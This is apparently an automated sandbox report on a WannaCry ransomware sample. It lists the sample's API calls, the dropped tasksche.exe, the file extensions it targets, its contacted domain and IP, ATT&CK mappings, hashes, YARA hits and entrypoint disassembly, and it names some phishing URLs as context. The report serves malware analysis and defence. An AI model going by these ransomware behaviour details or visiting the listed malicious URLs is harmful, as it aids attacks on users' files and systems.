Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,	0_2_00407C40
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,	1_2_00407C40
Source: C:\Windows\tasksche.exe	Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,	2_2_00401CE8

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	Code function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,		0_2_00408090
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	Code function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,		1_2_00408090

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Code function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00407C40

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Code function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,

0_2_00407CE0

Source: tasksche.exe, 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, MSNRf9dZ63.exe, tasksche.exe.0.dr

Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: MSNRf9dZ63.exe

Static file information: File size 6729728 > 1048576

Source: MSNRf9dZ63.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x305000
Source: MSNRf9dZ63.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000

Source: C:\Windows\tasksche.exe	Code function: 2_2_00407710 push eax; ret		2_2_0040773E
Source: C:\Windows\tasksche.exe	Code function: 2_2_004076C8 push eax; ret		2_2_004076E6

Source: C:\Windows\tasksche.exe

Code function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00401A45

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Executable created and started: C:\WINDOWS\tasksche.exe

Jump to behavior

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

File created: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

File created: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Code function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00407C40

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe TID: 5488

Thread sleep time: -86400000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Thread delayed: delay time: 86400000

Jump to behavior

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Thread delayed: delay time: 86400000

Jump to behavior

Source: MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp, MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,

Source: C:\Windows\tasksche.exe

Code function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00401A45

Source: C:\Windows\tasksche.exe

Code function: 2_2_004029CC free,GetProcessHeap,HeapFree,

2_2_004029CC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Service Execution	4 Windows Service	4 Windows Service	12 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MSNRf9dZ63.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
MSNRf9dZ63.exe	83%	Virustotal		Browse
MSNRf9dZ63.exe	100%	Avira	TR/AD.WannaCry.sewvt
MSNRf9dZ63.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\tasksche.exe	100%	Avira	TR/AD.WannaCry.sewvt
C:\Windows\tasksche.exe	100%	Joe Sandbox ML
C:\Windows\tasksche.exe	98%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Windows\tasksche.exe	89%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.tasksche.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.MSNRf9dZ63.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.0.MSNRf9dZ63.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.2.MSNRf9dZ63.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.0.MSNRf9dZ63.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.0.MSNRf9dZ63.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.MSNRf9dZ63.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
2.0.tasksche.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.2.MSNRf9dZ63.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.0.MSNRf9dZ63.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File

Domains

Source	Detection	Scanner	Label	Link
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	16%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	100%	URL Reputation	malware
https://www.kryptoslogic.com	0%	URL Reputation	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	100%	URL Reputation	malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	100%	URL Reputation	malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ	0%	URL Reputation	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.173.80	true	true	16%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	MSNRf9dZ63.exe	true	URL Reputation: malware	unknown
https://www.kryptoslogic.com	MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0	MSNRf9dZ63.exe, 00000001.00000002.254593327.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ	MSNRf9dZ63.exe, 00000001.00000002.252440796.000000000019C000.00000004.00000010.00020000.00000000.sdmp	true	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.16.173.80	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	721108
Start date and time:	2022-10-12 06:22:12 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MSNRf9dZ63.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.evad.winEXE@4/1@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.4% (good quality ratio 90.1%) Quality average: 76.9% Quality standard deviation: 32.6%
HCA Information:	Successful, ratio: 54% Number of executed functions: 6 Number of non-executed functions: 40
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded domains from analysis (whitelisted): fs.microsoft.com
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:23:13	API Interceptor	1x Sleep call for process: MSNRf9dZ63.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.16.173.80	RE8WkQYyxM.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	FtslFokzJt.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	FnRe3LZ2g8.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	mUzi34RGl4.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	fEZ8Iq7kyN.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	nU6RI2laJn.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	e0R5qxY8Vj.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	bGmT7Wjbn1.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	101.bin.exe	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	y2jb4FtSNq.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	KzTwbZkCyW.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	mAgMRXeHnV.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	u25HmIWOKl.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	JnqM1TFtYi.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	5hHHsExlwx.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	XHlAv3DhlB.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	VzAh2pC8hQ.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	MSmReFKunQ.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	bdXynoRgnV.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
	NXE94LoM7v.dll	Get hash	malicious	Browse	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	1jGr1mY0jf.exe	Get hash	malicious	Browse	104.17.244.81
	RE8WkQYyxM.exe	Get hash	malicious	Browse	104.16.173.80
	myGCO8gF16.exe	Get hash	malicious	Browse	104.17.244.81
	lPgU0gXc07.exe	Get hash	malicious	Browse	104.17.244.81
	FtslFokzJt.exe	Get hash	malicious	Browse	104.16.173.80
	FnRe3LZ2g8.exe	Get hash	malicious	Browse	104.16.173.80
	mUzi34RGl4.exe	Get hash	malicious	Browse	104.16.173.80
	BlJkPQbfq8.exe	Get hash	malicious	Browse	104.17.244.81
	fEZ8Iq7kyN.dll	Get hash	malicious	Browse	104.16.173.80
	aXhkuEgYQi.exe	Get hash	malicious	Browse	104.17.244.81
	nU6RI2laJn.exe	Get hash	malicious	Browse	104.16.173.80
	e0R5qxY8Vj.exe	Get hash	malicious	Browse	104.16.173.80
	RwsqSjIoeY.exe	Get hash	malicious	Browse	104.17.244.81
	MTyz7SbF68.dll	Get hash	malicious	Browse	104.17.244.81
	fjMkGgiDGv.dll	Get hash	malicious	Browse	104.16.173.80
	bGmT7Wjbn1.dll	Get hash	malicious	Browse	104.17.244.81
	101.bin.exe	Get hash	malicious	Browse	104.16.173.80
	Win32.Wannacry.dll	Get hash	malicious	Browse	104.17.244.81
	y2jb4FtSNq.dll	Get hash	malicious	Browse	104.16.173.80
	HhDMZKWBi5.dll	Get hash	malicious	Browse	104.17.244.81

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Browse	104.21.93.30
	1jGr1mY0jf.exe	Get hash	malicious	Browse	104.17.244.81
	file.exe	Get hash	malicious	Browse	172.67.70.233
	https://www.zip711.com/forms/message/tc/?encoder=base64&tracking=YhexNnDMNko85G4IdTlnTbTtREM2qWXdjLIwFR4jUmNAVTtPbD5hQAhBTx95QuYqZ6DFpJGH5ekFqswehlp3ZjzIYvKnL6E59/XBz5cxF7zaSKI+ST7QYijnpFWHJ3VG5WQFhjvNFRfmgSx+WgPdhd4J7O3qb4C6HGq6q7MOcH5sb68x88RXIAMYNwNkS3Uvo08daliNlnVerDDKtAEjfIqkpRSkeSka6gptLoEdiE+8k5Mxo9ms0suqWjE6HgnI&url=aHR0cHM6Ly9taWMtb25saW5lLmNmZD9lPWtlbGFtaW5AYXJjZS5vcmc=	Get hash	malicious	Browse	104.16.169.131
	file.exe	Get hash	malicious	Browse	172.67.144.83
	file.exe	Get hash	malicious	Browse	104.26.0.100
	file.exe	Get hash	malicious	Browse	172.67.144.83
	#Ud83c#Udfa4 Voice.html	Get hash	malicious	Browse	104.18.11.207
	https://www.marketbeat.com/scripts/click.aspx?MessageQueueID=14351&UserID=3747225&SubjectLineID=0&RedirectURL=http://Cms-cmck.joysofthesouthwest.com/1/aGVsZW4ucm9kd2VsbEBjbXMtY21jay5jb20=	Get hash	malicious	Browse	172.66.43.14
	https://www.sowal30a.net/forms/message/tc/?tracking=o4MfLgQQaLS2l5nkRNV9T_VHPyJ6b-FSn7KldD1IIR_kkRszsi7X1_8OdoiW93JjAMV3bHk_9C7aUICXcr9Jaas4ggPgvzPFHDKq41bNwCLDUwQwsEGMyIqffPRrscSiecae7c9e29bc089ecc8041f65e19a64c&url=aHR0cHM6Ly9taWMtMGZ0LmNmZC8/ZT1iR0YxY21FdWFYQnpaVzVBWld4c2RXTnBZVzR1WTI5dA==&encoder=base64	Get hash	malicious	Browse	104.16.169.131
	https://vk.com/away.php?to=https%3A%2F%2F31knj9.codesandbox.io/hh-%2FLAPsAMEU1d%23edward_halperin@nymc.edu&post=750781170_184&cc_key=	Get hash	malicious	Browse	172.64.144.239
	file.exe	Get hash	malicious	Browse	104.26.1.100
	Y09112022OK.htm	Get hash	malicious	Browse	104.17.25.14
	https://proscitech.com.au/collections/dangerous-goods	Get hash	malicious	Browse	172.67.38.66
	file.exe	Get hash	malicious	Browse	104.26.1.100
	file.exe	Get hash	malicious	Browse	172.67.144.83
	file.exe	Get hash	malicious	Browse	104.26.0.100
	file.exe	Get hash	malicious	Browse	104.26.1.100
	20082994838.htm	Get hash	malicious	Browse	104.18.11.207
	file.exe	Get hash	malicious	Browse	172.67.144.83

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\tasksche.exe

Download File

Process:	C:\Users\user\Desktop\MSNRf9dZ63.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3514368
Entropy (8bit):	7.996072890929898
Encrypted:	true
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
MD5:	7F7CCAA16FB15EB1C7399D422F8363E8
SHA1:	BD44D0AB543BF814D93B719C24E90D8DD7111234
SHA-256:	2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
SHA-512:	83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
Malicious:	true
Yara Hits:	Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly) Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 98% Antivirus: Metadefender, Detection: 89%, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.315026188747063
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MSNRf9dZ63.exe
File size:	6729728
MD5:	1d38638153085a0a0f0a4f7174e52a9b
SHA1:	f0bb8179052451ac327e6fff048bc27c73bf7310
SHA256:	9678763f65e207dde99f4f8723ddfc44bc2d3f9b490aa3d3d4676c661474d59f
SHA512:	ff7c5b94ffff6e6d877e18b3fb543235d3bcb3e27b5d27a5fdc60005b4095a1ba21a4365a7a41bf6ed1e42fe547d6ddf0d05ed78442cd7ec42668b80a0a0d8f6
SSDEEP:	98304:5iqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2HI:5iqPe1Cxcxk3ZAEUadzR8yc4HI
TLSH:	67663394612CB2FCF0440EB44473892AB7B33C69A7BA5E1F9BC086660D53F5BAFD0641
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x409a16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9ecee117164e0b870a53dd187cdd7174

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040A1A0h
push 00409BA2h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040A0C0h]
pop ecx
or dword ptr [0070F894h], FFFFFFFFh
or dword ptr [0070F898h], FFFFFFFFh
call dword ptr [0040A0C8h]
mov ecx, dword ptr [0070F88Ch]
mov dword ptr [eax], ecx
call dword ptr [0040A0CCh]
mov ecx, dword ptr [0070F888h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040A0E4h]
mov eax, dword ptr [eax]
mov dword ptr [0070F890h], eax
call 00007F7CF0957D11h
cmp dword ptr [00431410h], ebx
jne 00007F7CF0957BFEh
push 00409B9Eh
call dword ptr [0040A0D4h]
pop ecx
call 00007F7CF0957CE3h
push 0040B010h
push 0040B00Ch
call 00007F7CF0957CCEh
mov eax, dword ptr [0070F884h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0070F880h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040A0DCh]
push 0040B008h
push 0040B000h
call 00007F7CF0957C9Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1e0	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x310000	0x35a454	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8bca	0x9000	False	0.534423828125	data	6.1345234015658825	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x998	0x1000	False	0.37646484375	data	3.9239511141494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x30489c	0x305000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x310000	0x35a454	0x35b000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
R	0x3100a4	0x35a000	PE32 executable (GUI) Intel 80386, for MS Windows	English	United States
RT_VERSION	0x66a0a4	0x3b0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dll	StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
